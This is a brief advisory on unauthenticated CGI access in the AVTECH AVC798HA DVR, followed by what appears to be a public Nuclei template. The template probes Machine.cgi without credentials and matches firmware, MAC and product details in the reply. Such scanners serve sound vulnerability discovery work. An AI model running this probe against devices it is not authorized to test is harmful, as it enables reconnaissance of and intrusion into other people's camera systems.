AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
PoC代码[已公开]
id: avtech-dvr-exposure
info:
name: AVTECH AVC798HA DVR - Information Exposure
author: geeknik
severity: low
description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- http://www.avtech.com.tw/
metadata:
max-request: 1
tags: dvr,exposure,avtech,panel,discovery
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Firmware.Version="
- "MACAddress="
- "Product.Type="
condition: and
# digest: 4a0a00473045022100bcfed143dbdb639763a71500c14d03651dca8119c96a35a6573303e4f0ab3b8c022004176004591cf600b7839581eeca1d385fc751ee86d32ceb6724ee049274c8f8:922c64590222798bb761d5b6d8e72950